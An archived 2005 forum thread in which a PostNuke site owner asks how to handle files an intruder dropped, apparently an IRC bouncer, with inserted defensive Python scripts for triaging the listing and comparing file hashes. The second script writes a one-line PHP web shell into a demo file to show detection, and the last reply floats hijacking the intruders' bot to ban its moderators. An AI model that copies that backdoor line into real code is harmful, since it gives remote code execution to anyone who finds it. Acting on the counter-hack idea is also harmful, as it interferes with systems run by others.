Zikula: A Flexible Open Source Content Management System
Site Hacked does anyone know anything about this
  • Posted: 23.05.2005, 18:58 by CountryFayre (rank: Softmore; registered May 2004; 66 posts)
    Hi there,
    we have a module that was written for us that has been hacked by, I believe, a chat room type script.

    Our host has taken the site off line, what I do not know is if PostNuke itself has been compromised.

    The directory created was (.unsecured) which contains the following files:

    -rw-r--r-- 1 httpd httpd 137 May 22 12:12 ci
    -rw-r--r-- 1 httpd httpd 82 May 22 12:12 ci.dir
    -rwxr-xr-x 1 httpd httpd 282 Jan 26 09:37 config
    -rw------- 1 httpd httpd 929 Jan 26 09:18 config.h
    -rw-r--r-- 1 httpd httpd 118 May 22 12:12 cron.d
    -rwxr-xr-x 1 httpd httpd 335 Jan 26 09:36 fuck
    drwxr-xr-x 2 httpd httpd 4096 Jan 26 09:18 help
    drwxr-xr-x 2 httpd httpd 4096 Jan 26 09:18 lang
    drwxr-xr-x 2 httpd httpd 4096 May 23 00:36 log
    drwxr-xr-x 2 httpd httpd 4096 Jan 26 09:35 motd
    -rwxr-xr-x 1 httpd httpd 14306 Jan 26 09:18 proc
    -rwxr-xr-x 1 httpd httpd 202544 Jan 26 09:18 psybnc
    -rw-r--r-- 1 httpd httpd 77 Jan 26 09:18 psybnc.conf
    -rw------- 1 httpd httpd 6 May 23 00:36 psybnc.pid
    -rwxr-xr-x 1 httpd httpd 60 Jan 26 09:37 run
    drwxr-xr-x 2 httpd httpd 4096 Jan 26 09:18 scripts
    -rwxr--r-- 1 httpd httpd 21516 Jan 26 09:18 xh
    -rwxr--r-- 1 httpd httpd 383 May 22 12:12 y2kupdate

    Plus Sub directories: Help, Lang, log, motd, scripts

    I am a newbie to this and have not had this sort of problem before.

    My question is, how can I check whether PN has been compromised? I can delete the Directory and reinstate my site but I do not want to do this until I know PN has not been affected.

    Any help appreciated.

    Thanks
    CF
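As an added example, not part of the original thread, the listing above can be triaged mechanically: the script below parses the `ls -l` lines and flags the entries a responder would look at first. The web-server account name `httpd` is taken from the listing itself; the psyBNC file names come from the thread; the size threshold and the reason strings are assumptions made for this illustration.

```python
import re
from collections import defaultdict

# The ".unsecured" listing as posted in the thread, used here as sample input.
LISTING = """\
-rw-r--r-- 1 httpd httpd 137 May 22 12:12 ci
-rw-r--r-- 1 httpd httpd 82 May 22 12:12 ci.dir
-rwxr-xr-x 1 httpd httpd 282 Jan 26 09:37 config
-rw------- 1 httpd httpd 929 Jan 26 09:18 config.h
-rw-r--r-- 1 httpd httpd 118 May 22 12:12 cron.d
-rwxr-xr-x 1 httpd httpd 335 Jan 26 09:36 fuck
drwxr-xr-x 2 httpd httpd 4096 Jan 26 09:18 help
drwxr-xr-x 2 httpd httpd 4096 Jan 26 09:18 lang
drwxr-xr-x 2 httpd httpd 4096 May 23 00:36 log
drwxr-xr-x 2 httpd httpd 4096 Jan 26 09:35 motd
-rwxr-xr-x 1 httpd httpd 14306 Jan 26 09:18 proc
-rwxr-xr-x 1 httpd httpd 202544 Jan 26 09:18 psybnc
-rw-r--r-- 1 httpd httpd 77 Jan 26 09:18 psybnc.conf
-rw------- 1 httpd httpd 6 May 23 00:36 psybnc.pid
-rwxr-xr-x 1 httpd httpd 60 Jan 26 09:37 run
drwxr-xr-x 2 httpd httpd 4096 Jan 26 09:18 scripts
-rwxr--r-- 1 httpd httpd 21516 Jan 26 09:18 xh
-rwxr--r-- 1 httpd httpd 383 May 22 12:12 y2kupdate
"""

# Fields of an `ls -l` line: perms, link count, owner, group, size,
# "Mon dd", time or year, name.
LS_RE = re.compile(
    r"^([-dl][rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+(\d+)\s+"
    r"(\w{3}\s+\d{1,2})\s+(\d{2}:\d{2}|\d{4})\s+(.+)$"
)

WEB_USER = "httpd"  # assumption: the account the web server runs as on this host
BOUNCER_NAMES = {"psybnc", "psybnc.conf", "psybnc.pid"}  # psyBNC files named in the thread
BIG_BINARY = 100_000  # assumed size threshold for "probably a compiled binary"


def parse_listing(text):
    """Turn `ls -l` output into a list of dicts, skipping lines that do not parse."""
    entries = []
    for line in text.splitlines():
        m = LS_RE.match(line.strip())
        if not m:
            continue
        perms, owner, group, size, day, clock, name = m.groups()
        entries.append({
            "perms": perms, "owner": owner, "group": group, "size": int(size),
            "day": day, "clock": clock, "name": name,
            "is_exec": perms[0] == "-" and "x" in perms[1:],
        })
    return entries


def triage(entries, web_user=WEB_USER):
    """Return {name: [reasons]} for the entries worth a closer look."""
    findings = defaultdict(list)
    for e in entries:
        if e["is_exec"] and e["owner"] == web_user:
            findings[e["name"]].append("executable owned by the web-server account")
        if e["name"] in BOUNCER_NAMES:
            findings[e["name"]].append("psyBNC IRC bouncer artefact")
        if e["name"].endswith(".pid"):
            findings[e["name"]].append("pid file: the program was started; check running processes")
        if e["is_exec"] and e["size"] > BIG_BINARY:
            findings[e["name"]].append("large executable, likely a compiled binary")
    return dict(findings)


def group_by_day(entries):
    """Cluster entries by modification date to separate the bulk unpack
    (mtimes preserved from the attacker's archive) from later activity."""
    groups = defaultdict(list)
    for e in entries:
        groups[e["day"]].append(e["name"])
    return {day: sorted(names) for day, names in groups.items()}


if __name__ == "__main__":
    entries = parse_listing(LISTING)
    for name, reasons in sorted(triage(entries).items()):
        print(f"{name:12} {'; '.join(reasons)}")
    for day, names in sorted(group_by_day(entries).items()):
        print(f"{day}: {', '.join(names)}")
```

Two things the output makes visible. Every file is owned by `httpd`, so the web server process itself wrote them: the entry point was something reachable over HTTP, which fits the suspicion about the custom module. The January timestamps do not date the break-in: unpacking an archive preserves the times stored in it, so the "Jan 26" cluster most likely shows when the attacker's kit was packed; the "May 22 12:12" cluster is the earliest activity on this host that the listing shows, and "May 23 00:36" the last time the bouncer was started. Modification times are trivially forged, so when the host is still available prefer the inode change time (`ls -lc`) and the ctime of the `.unsecured` directory itself.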
  • Posted: 23.05.2005, 21:19 by alarconcepts (rank: Professional; registered April 2004; 2723 posts)
    I would revert to a backup saved before the .unsecure directory was created. You can replace PN files with ease... just remember to save your config file and migrate the settings in it to the new one. Many times people will put small hacks in modules and PN itself, so if you have, be sure to replace those as well.

    --
    Photography | PHP | Other
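One way to answer "has PN itself been compromised" without trusting a backup (which may already carry the backdoor) is to hash every file in the live document root and compare it against a pristine copy of the same PostNuke release unpacked from the original download. The script below is an added example, not code from the thread or from PostNuke: the two directory trees it builds, the file names in them and the `config.php` convention for the site-specific settings are constructed for illustration.

```python
import hashlib
import os
import tempfile

# Files expected to differ from the vendor release even on a clean install.
# Assumption: the site-specific settings live in config.php (the "config file"
# the reply above says to save).
EXPECTED_LOCAL = {"config.php"}


def hash_tree(root):
    """Map each relative path under root to the SHA-256 of its contents."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


def compare_trees(pristine_root, live_root):
    """Classify every path as added, missing, modified, or an expected local change."""
    pristine = hash_tree(pristine_root)
    live = hash_tree(live_root)
    report = {"added": [], "missing": [], "modified": [], "local": []}
    for rel in sorted(set(pristine) | set(live)):
        if rel not in pristine:
            report["added"].append(rel)
        elif rel not in live:
            report["missing"].append(rel)
        elif pristine[rel] != live[rel]:
            bucket = "local" if rel in EXPECTED_LOCAL else "modified"
            report[bucket].append(rel)
    return report


def _write(root, rel, data):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as f:
        f.write(data)


def run_demo():
    """Constructed demonstration: a vendor tree and a live tree in which one
    module file has a backdoor appended and one directory was dropped."""
    with tempfile.TemporaryDirectory() as tmp:
        pristine = os.path.join(tmp, "PostNuke-vendor")
        live = os.path.join(tmp, "htdocs")
        base = {  # illustrative file names, not the real PostNuke tree
            "index.php": b"<?php include 'includes/pnAPI.php'; ?>\n",
            "config.php": b"<?php $pnconfig['dbhost'] = 'localhost'; ?>\n",
            "modules/Example/pnuser.php": b"<?php function Example_user_main() { return 'ok'; } ?>\n",
        }
        for rel, data in base.items():
            _write(pristine, rel, data)
            _write(live, rel, data)
        # site-specific settings: expected to differ from the vendor copy
        _write(live, "config.php", b"<?php $pnconfig['dbhost'] = 'db.example.invalid'; ?>\n")
        # a web shell appended to an existing module file (constructed)
        _write(live, "modules/Example/pnuser.php",
               base["modules/Example/pnuser.php"] + b"<?php eval($_REQUEST['c']); ?>\n")
        # the attacker's dropped directory, as in the listing posted above
        _write(live, ".unsecured/psybnc.conf", b"(contents irrelevant to the hash check)\n")
        return compare_trees(pristine, live)


if __name__ == "__main__":
    for bucket, paths in run_demo().items():
        print(f"{bucket:9} {paths}")
```

Run it against a fresh download of the exact version you installed, never against your own backup. Anything under "added" that you did not put there yourself, and anything under "modified" other than hacks you made deliberately, needs to be read; PHP that passes request data to `eval`, `system` or `base64_decode` is the usual tell. This only covers files: database content such as an extra admin user, and the custom module (which has no vendor copy to compare against) still need separate review.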
  • Posted: 23.05.2005, 21:23 by beeb (rank: Freshman; registered April 2005; 15 posts)
    My guess is that it's an IRC bot thingy.

    Usually they don't hack websites because the hackers are trying to fly under the radar with their bot so they don't get found out.

    But it's always good to check... And reinstall if you're worried...
  • Posted: 23.05.2005, 21:29 by CountryFayre (rank: Softmore; registered May 2004; 66 posts)
    Thanks alarconcepts for the advice.
    Silly question maybe, but is there any way of checking for hacks in the other modules without working from a backup?
  • Posted: 23.05.2005, 21:30 by alarconcepts (rank: Professional; registered April 2004; 2723 posts)
    As in: hacks you made yourself?

    --
    Photography | PHP | Other
  • Posted: 23.05.2005, 21:33 by CountryFayre (rank: Softmore; registered May 2004; 66 posts)
    Beeb
    What is an IRC bot? Can you explain? Is there a way of finding out from within the files?
    Cheers
  • Posted: 23.05.2005, 21:42 by CountryFayre (rank: Softmore; registered May 2004; 66 posts)
    alarconcepts
    I did not read your message correctly the first time, I see what you are saying now.
    From what I have learned so far I think I am safe just deleting the directory and making the site operational again.
    I would be interested to learn what I have done wrong to allow this code to be installed in our site.
    Thanks
  • Posted: 23.05.2005, 21:54 by beeb (rank: Freshman; registered April 2005; 15 posts)
    IRC = Internet Relay Chat

    Bots are used to maintain and monitor the channel. A bot can automatically upgrade users to Moderators when they sign-on, or they can kick people off the channel for whatever reason.

    System administrators don’t like bots running on their puters because they take up processing power. So the channel operators look for systems they can exploit to get their bots running.

    I suppose if one looked at the configuration file they might be able to find out what channel the bot is for. But then what?

    A nasty thing to do would be to lock up your system so they can’t get back in, modify the configuration files to ban the usual moderators, and so on…
